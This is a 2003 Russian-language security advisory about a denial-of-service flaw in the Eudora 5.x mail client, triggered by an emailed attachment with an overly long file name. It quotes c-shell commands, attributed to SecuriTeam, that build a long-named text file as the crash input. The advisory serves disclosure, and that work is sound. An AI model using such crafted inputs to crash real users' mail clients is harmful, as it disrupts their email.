Security Lab

DoS против Eudora

Дата публикации:10.03.2003
Всего просмотров:888
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Eudora 5.x
Описание: Уязвимость отказа в обслуживании обнаружена в почтовом клиенте Eudora. Удаленный пользователь может послать почтовое сообщение, которое приведет к аварийному завершению работы клиента.

SecuriTeam сообщил, что удаленный пользователь может послать e-mail сообщение с файлом, который имеет длинное имя, целевому пользователю, чтобы аварийно завершить работу программы. Пример:

Create a text file with a long name using:
$ set a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
and
$ echo "security" >! $a.txt
(Written in c-shell)
Уязвимость обнаружена в Eudora Versions 5.1.*